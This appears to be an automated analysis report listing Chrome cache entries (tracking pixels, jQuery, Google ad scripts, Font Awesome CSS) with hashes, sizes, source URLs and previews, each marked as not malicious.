SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 278

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (2008)
Category:	downloaded
Size (bytes):	13020
Entropy (8bit):	5.338335125035746
Encrypted:	false
SSDEEP:	192:pl/66sGOASROqI3wgh5MXnYY9EAhMmK3qzfaGxCLLgIJQaYmx:rnsGN6JIVs3LLK3qzf6gIZYmx
MD5:	D1F231B50B152372A6C3100F4AED1973
SHA1:	1BF10951BE06DA03D1371A904E19C0419F2A3637
SHA-256:	9DEC95894AF322B087AB6E87F9C8CE66D849646CF33B375D33C957F4569ED081
SHA-512:	00093B7FC4AFFA2D2230622F5D7DA69730246B74620AD4DE30AC64E41FB9AC927AFD2AB426034D71DC85A3DFEE9A46E73DF48DA7E2636A54579EA9AAAC4CAFF6
Malicious:	false
Reputation:	unknown
URL:	https://ep2.adtrafficquality.google/sodar/sodar2/232/runner.html
Preview:	<!DOCTYPE html>.<meta charset=utf-8><script>.(function(){'use strict';function m(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var p=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function aa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=aa(this),u=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",v={},w={};function x(a,b,c){if(!c\|\|a!=null){c=w[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function y(a,b,c){if(b)a:{var e=a.split(".");a=e.length===1;var f=e[0],h;!a&&f in v?h=v:h=r;for(f=0;f<e.length-1;f++){var d=e[f];if(!(d in h))break a;h=h[d]}e=e[e.length-1];c=u&&c==="es6"?h[e]:null;b=b(c);b!=null&&(a?p(v,e,{config

Chrome Cache Entry: 279

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	87533
Entropy (8bit):	5.262536918435756
Encrypted:	false
SSDEEP:	1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr
MD5:	2C872DBE60F4BA70FB85356113D8B35E
SHA1:	EE48592D1FFF952FCF06CE0B666ED4785493AFDC
SHA-256:	FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
SHA-512:	BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
Malicious:	false
Reputation:	unknown
URL:	https://code.jquery.com/jquery-3.7.1.min.js
Preview:	/! jQuery v3.7.1 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n\|\|C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove

Chrome Cache Entry: 280

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3673)
Category:	downloaded
Size (bytes):	167093
Entropy (8bit):	5.605068543657521
Encrypted:	false
SSDEEP:	3072:xOWww+JsoKGFDisDc1MO3FC/lAVPrNoG8Uiqug9R9a7lAXmjuGSndT5RQRiWf:xOWwwboKGFDisDc1MO3w9yrNoGriqJ9i
MD5:	4A6B61172746935722EE074D3F0ECA16
SHA1:	8BB7775710EB21DE3416A3C2C5DA7F5D2E883E70
SHA-256:	975A1DFD84BF06CC6D0A2021BDABE3EACD69098D6FECE654875E8FB4C329435E
SHA-512:	14421A26CA7FEBF9683DEF1E5CB956CC26446E2FDC8AB5CCC35DD1B1E02A93C4700511C959EA057DE16A8DA6C0F6086B0D32082B422E635D0DB627AB25BD8A7E
Malicious:	false
Reputation:	unknown
URL:	https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9495854422341365
Preview:	(function(sttc){'use strict';var aa,ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ha={};function ia(a,b,c){if(!c\|\|a!=null){c=ha[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ha[d]===void 0&&(a=Math.random()*1E9>>>0,ha[d]=ea?da.Symbol(d):"$jscp$"+a+

Chrome Cache Entry: 281

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 282

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	42
Entropy (8bit):	3.0241026136709444
Encrypted:	false
SSDEEP:	3:CUXPQEsJ+q:1QEsJ+q
MD5:	32023BB33CFB2A1990A4EF2D85B6AC16
SHA1:	23DCC6D4B5BFE00357FD0248BB5955B8E36BB8F1
SHA-256:	99C2917EE5B2A01459A923BDD1C676F15EE73B62B87F696E6735312D26F51E12
SHA-512:	D052ECEC2839340876EB57247CFC2E777DD7F2E868DC37CD3F3F740C8DEB94917A0C9F2A4FC8229987A0B91B04726DE2D1E9F6BCBE3F9BEF0E4B7E0D7F65EA12
Malicious:	false
Reputation:	unknown
Preview:	GIF89a.............!.......,...........L.;

Chrome Cache Entry: 283

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=309242622&google_hm=42792e3cde3b100032f83ab40466
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 284

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	42
Entropy (8bit):	2.9881439641616536
Encrypted:	false
SSDEEP:	3:CUXPQE/xlEy:1QEoy
MD5:	D89746888DA2D9510B64A9F031EAECD5
SHA1:	D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
SHA-256:	EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
SHA-512:	D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
Malicious:	false
Reputation:	unknown
URL:	"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsukzXYtKgQwzqdkYcHscfxpATW6iBfCCn4wS1iudB-Krvzmf_rqZV4DHoRYbtFcbX2unbNTik5xBE7KxqiYcDsxx3iSYcdBzryJCScB3hPajo-2WbXIIbt8OsyT0qYUDlqUX8gToSa6Z-bad2cbhecekMx1C9OWCk-x_-Be&sai=AMfl-YQcRPnfb5tUZcWvAz3nVj177aVLWRi64hrpF80c8G2vGrsRcfUM4jTxZbDsjvAFE7rYKYtSPJZYCIyxEelbeSJj4_Pg_oRF9wjlQRt8ffEeBKwBbPoNrv6Eh1Ou&sig=Cg0ArKJSzFcs4knwi8veEAE&cid=CAQSPACa7L7dvOfHXQ8tNna9MeQrnXaTBxJSGZXlWkRz7nq8OEQNAS3jbkB4vISvBnDrwSJ9Ewa8LSQ51hv0XxgB&id=lidar2&mcvt=1003&p=0,0,124,1005&tm=2727&tu=1724.1000000000058&mtos=1003,1003,1003,1003,1003&tos=1003,0,0,0,0&v=20241030&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=4&adk=1812271801&rs=2&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=v&co=2633157300&rst=1730398773126&rpt=2278&met=mue&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
Preview:	GIF89a.............!.......,...........D.;

Chrome Cache Entry: 285

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=beeswaxio&google_sc=&google_hm=QUFDOUVFN09SNVFBQUJRUkRLV1VFdw&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&bee_sync_partners=&bee_sync_current_partner=adx&bee_sync_hop_count=1
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 286

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 287

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	42251
Entropy (8bit):	7.951768521989965
Encrypted:	false
SSDEEP:	768:+JpQfb72PXOQ11kDIbUAE9T6IH7L1dNZiA6/icH8ptiay:+Kbm0DIPE92IbL1PQZcpW
MD5:	EF3F0CA25DE1F5F3BD96A74B1C172D84
SHA1:	127E9ED66FC8EF63DB4B813B50BC7F3ADC3EFB93
SHA-256:	E67D373F58E4CE21BA50E28CB693009364D400F7F85C5472C76BA7AC2CBDF726
SHA-512:	3BF72370C4ED45B588C92AB243626987660D3B3A0AE5079038E72D8B9C9ECF7BEB7339565388900348BCD7EED4AF63C7E27DEEF10123895D45DA8F1F3B33ED11
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/6532318905545041031/14763004658117789537
Preview:	.PNG........IHDR.......t.....5V*e....PLTE..............................................................i..r..........}..f......Y..............`....!g..r..........2.........l.............p.K...n..[..R..x.....b.~..O...U..}..x..^..\..s........j..z..T..e..\........I.v.........b....T..Z...s.^..l.........U....._....3.....t..l.._..0\|.}......f..I..:.....l..E.......9..b..?u..R....._.........\|...........x.]..k.......z..]..b......u.r1.. .IDATx....6..-."...(ucI.%.%EL.Y....o[7v...g..........?..9.H..%J.-'>....-. H\|yppp..H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..

Chrome Cache Entry: 288

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2735)
Category:	dropped
Size (bytes):	24842
Entropy (8bit):	5.536285587605039
Encrypted:	false
SSDEEP:	768:n7xrC/PnLU3EEz0d0Pe49cg/8USqro7Zii4kTIKaJmmUQeG:s7w1pEcK1GmtG
MD5:	C1BE04166BF406D39CBDF416DBC727EB
SHA1:	5160F6ACF663F376BFB6CD1CAA38F18BA43E8C8A
SHA-256:	C584101707A4CBEB1449B2CACB97E75453B6A9CBFF4795B8A6CD89DD555A639D
SHA-512:	00A987E8621869C7063E6AD44E290AFA6C50E24640280938172D20BC19B44B543D6FA150C707EE487F69DD9A197C3F328B8E8765EA60BB147E430CAD97C49D5D
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var q=this\|\|self;function aa(a){q.setTimeout(()=>{throw a;},0)};var ba,ca;a:{for(var da=["CLOSURE_FLAGS"],ea=q,fa=0;fa<da.length;fa++)if(ea=ea[da[fa]],ea==null){ca=null;break a}ca=ea}var ha=ca&&ca[610401301];ba=ha!=null?ha:!1;var r;const ia=q.navigator;r=ia?ia.userAgentData\|\|null:null;function ka(a){return ba?r?r.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function y(a){var b;a:{if(b=q.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function A(){return ba?!!r&&r.brands.length>0:!1}function la(){return A()?ka("Chromium"):(y("Chrome")\|\|y("CriOS"))&&!(A()?0:y("Edge"))\|\|y("Silk")};function ma(a){ma[" "](a);return a}ma[" "]=function(){};!y("Android")\|\|la();la();y("Safari")&&(la()\|\|(A()?0:y("Coast"))\|\|(A()?0:y("Opera"))\|\|(A()?0:y("Edge"))\|\|(A()?ka("Microsoft Edge"):y("Edg/"))\|\|A()&&ka("Opera"));let na;function pa(){const a=Error();a.__closure__error__context__

Chrome Cache Entry: 289

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1382)
Category:	dropped
Size (bytes):	17945
Entropy (8bit):	5.330388445341784
Encrypted:	false
SSDEEP:	384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
MD5:	3B071D5606CC1CF92AE307F5BDB4E540
SHA1:	E191068CC90E5489130489A1CF173FE50BBA28B8
SHA-256:	FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
SHA-512:	8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c\|\|a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]

Chrome Cache Entry: 290

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (27377)
Category:	downloaded
Size (bytes):	27592
Entropy (8bit):	4.83669575258768
Encrypted:	false
SSDEEP:	384:Euwu4Eyfd7PNRzAmReUtPAM0NuzwpmnWt:ETuqdNReUtPAM0v4E
MD5:	5E5B0D8C7BE5919570A305B6BC229A36
SHA1:	E4AB3A85D3AB0A8654A278D954FB310906526DB3
SHA-256:	1AE3C19265723696F50E3226DCD43FBC7EA617697E0D7169A8E52C854AE3826C
SHA-512:	7FB88208B7D2E585F6C2B49BAF85AEF8D374A1C3F565596B50FFE49F2B5B6B5E1B39DADFCCC0E9971000346957551DA6316A911CDEED502B1983EB1598F37D62
Malicious:	false
Reputation:	unknown
URL:	https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v4-shims.min.css?token=8ce76d2187
Preview:	/!. Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa.fa-glass:before{content:"\f000"}.fa.fa-envelope-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-star-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-home:before{content:"\f015"}.fa.fa-file-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-arrow-circle-o-dow

Chrome Cache Entry: 291

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	2.9889835948335506
Encrypted:	false
SSDEEP:	3:CUkxl7/lHh/:slf/
MD5:	B4491705564909DA7F9EAF749DBBFBB1
SHA1:	279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
SHA-256:	4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
SHA-512:	B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
Malicious:	false
Reputation:	unknown
URL:	https://widget.us.criteo.com/dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1
Preview:	GIF89a.............!.......,...........D..;

Chrome Cache Entry: 292

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 293

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 294

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	43
Entropy (8bit):	2.9889835948335506
Encrypted:	false
SSDEEP:	3:CUkxl7/lHh/:slf/
MD5:	B4491705564909DA7F9EAF749DBBFBB1
SHA1:	279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
SHA-256:	4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
SHA-512:	B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
Malicious:	false
Reputation:	unknown
Preview:	GIF89a.............!.......,...........D..;

Chrome Cache Entry: 295

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3673)
Category:	dropped
Size (bytes):	160392
Entropy (8bit):	5.599087929847065
Encrypted:	false
SSDEEP:	3072:xOWww+JsoKGFDisDc1MO3FC/lAVPrNoG8Uiqug9R9a7lAXmjuGSndT5RQRihw:xOWwwboKGFDisDc1MO3w9yrNoGriqJ9u
MD5:	3E6EA3554017077B1DB339B6F302DCB2
SHA1:	57A5CD8DDA768C84EED2760A4491F175C88D948F
SHA-256:	63361D41FF9D87004D1380F9760B773B939324CA16A3670929BFDB10C4A353A3
SHA-512:	0D3A3E105024F89FB0D1CA9211916D444F3FFBA9D2963B931FA3ACE0CAB08BC142D5622996B30CCC58481CFE0638959F0E6BBF8BE112644E9A83D8D633DDEE82
Malicious:	false
Reputation:	unknown
Preview:	(function(sttc){'use strict';var aa,ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ha={};function ia(a,b,c){if(!c\|\|a!=null){c=ha[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ha[d]===void 0&&(a=Math.random()*1E9>>>0,ha[d]=ea?da.Symbol(d):"$jscp$"+a+

Chrome Cache Entry: 296

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
